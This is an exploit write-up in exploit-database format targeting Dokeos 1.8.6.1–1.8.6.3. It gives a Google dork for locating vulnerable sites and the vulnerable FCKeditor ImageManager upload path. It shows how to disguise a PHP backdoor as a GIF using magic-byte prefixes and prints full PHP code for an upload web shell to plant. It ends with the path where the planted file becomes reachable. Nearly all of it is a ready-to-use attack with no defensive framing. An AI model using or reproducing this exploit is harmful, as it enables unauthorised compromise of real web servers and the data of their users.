Share
# Exploit Title: Dokeos 1.8.6.3 and 1.8.6.1- Arbitrary File Upload  
# Google Dork: "Plateforme Dokeos 1.8.6.3 " or 1.8.6.1  
# Date: 17/09/2019  
# Exploit Author: Sohel Yousef Jellyfish security team  
# Vendor Homepage: https://www.dokeos.com/  
# Software Link: https://www.dokeos.com/  
# Version: 1.8.6.3 - 1.8.6.1  
# Tested on: kali linux  
# CVE : N/A  
  
# go to this dir to upload your file dokeos  
1.8.6.3/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php  
# you can insert and upload files rename your file to bel like  
backdoor.php.gif  
# and add this GIF89;aGIF89;aGIF89;a before <?PHP  
# to be like this for examlple  
  
GIF89;aGIF89;aGIF89;a<html>  
<head>  
<title>PHP Test</title>  
<form action="" method="post" enctype="multipart/form-data">  
<input type="file" name="fileToUpload" id="fileToUpload">  
<input type="submit" value="upload file" name="submit">  
</form>  
</head>  
<body>  
<?php echo '<p>FILE UPLOAD</p><br>';  
$tgt_dir = "uploads/";  
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);  
echo "<br>TARGET FILE= ".$tgt_file;  
//$filename = $_FILES['fileToUpload']['name'];  
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];  
if(isset($_POST['submit']))  
{  
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))  
{ echo "<br>file exists, try with another name"; }  
else {  
echo "<br>STARTING UPLOAD PROCESS<br>";  
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],  
$tgt_file))  
{ echo "<br>File UPLOADED:- ".$tgt_file; }  
  
else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }  
}  
}  
?>  
</body>  
</html>  
  
# upload the file and you can find your file here on this image browser  
main/inc/lib/fckeditor/editor/plugins/ImageManager/images.php  
# click and view the image / file you and will be here --->  
dokeos/main/upload/users/0/my_files/.thumbs/.yourfile.php.gif  
# remove .thumbs. to be like this  
/main/upload/users/0/my_files/yourfile.php.gif  
# and your file are ready  
################################################################################################